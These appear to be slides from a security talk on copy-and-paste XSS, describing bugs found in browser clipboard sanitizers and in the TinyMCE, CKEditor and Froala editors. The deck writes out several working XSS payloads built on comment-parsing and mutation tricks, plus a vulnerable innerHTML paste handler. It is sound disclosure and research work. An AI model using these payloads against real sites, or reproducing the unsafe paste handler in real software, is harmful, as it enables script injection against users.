The Curious Case
of Copy and Paste
Michał Bentkowski
securitum.pl
The Curious Case of Copy and Paste
Michał Bentkowski
securitum.pl
- Security tester
- Training instructor
- Researcher
- From 2016 to 2019 in Google Bug Bounty Hall of Fame TOP 10
- Loving browser security
- @SecurityMB
- Pentests (web applications, mobile, network)
- Trainings
- Sekurak.pl
Assume you copy something from one page.
Then paste it in another.
Could anything go wrong?
DEMO #1
Let's talk about rich editors (WYSIWYG editors).
DEMO #2
Browsers attempt to sanitize pasted content.
I've found at least one bug in the clipboard sanitizers of all major browsers.
crbug.com/1011950
The issue exploited:
- Elements merging
- Foreign content shenanigans
.<math>.<xss style=display:block>.<style>.<a title="</style><img src onerror=alert(1)>">.
Q: Is Cross-Site Scripting the only risk when pasting untrusted content?
A: NO!
DEMO
Q: So browsers fixed all copy&paste issues. Are we safe now?
A: NO, again!
With JavaScript, editors can process pasted data, and bypass the browser's sanitizer.
With JavaScript, editors can process pasted data, and bypass the browser's sanitizer.
document.onpaste = ev => {
ev.preventDefault();
let html = ev.clipboardData.getData('text/html');
}
With JavaScript, editors can process pasted data, and bypass the browser's sanitizer.
document.onpaste = ev => {
ev.preventDefault();
let html = ev.clipboardData.getData('text/html');
div.innerHTML = html; // 😱
}
Virtually every single WYSIWYG editor processes pasted data.
- Sanitize content
- Make the HTML more consistent
- Delete unexpected markup
- Handle markup from known editors
First example: TinyMCE
TinyMCE employs its own HTML parser.
The parser failed to recognize certain features of HTML5.
Assume that we have an HTML comment, started with "<!--". How do we end it?
-->
--!>
<!-- --!> <img src=1 onerror=alert(1)> -->
According to TinyMCE, everything is in a comment. The markup is thus harmless.
The browser parses it differently, leading to script execution.
Another popular editor is CKEditor.
<!--{cke_protected}--!><img src onerror=alert("cke_protected")> -->
Root cause very similar to TinyMCE.
Third example: Froala
Froala processed the HTML as string (it is almost always a bad idea!)
a<u title='<noscript>"><img src onerror=alert(1)></noscript>'>b
a<u title='[FROALA.EDITOR.NOSCRIPT 0]'>b
a<u title="[FROALA.EDITOR.NOSCRIPT 0]">b
a<u title="<noscript>"><img src onerror=alert(1)></noscript>">b
That's all!
... but wait! What happened in Jira?!
Thanks!
Michał Bentkowski
@SecurityMB
https://securitum.pl
https://xss.academy
The Curious Case of Copy & Paste
By securitymb
The Curious Case of Copy & Paste
- 1,312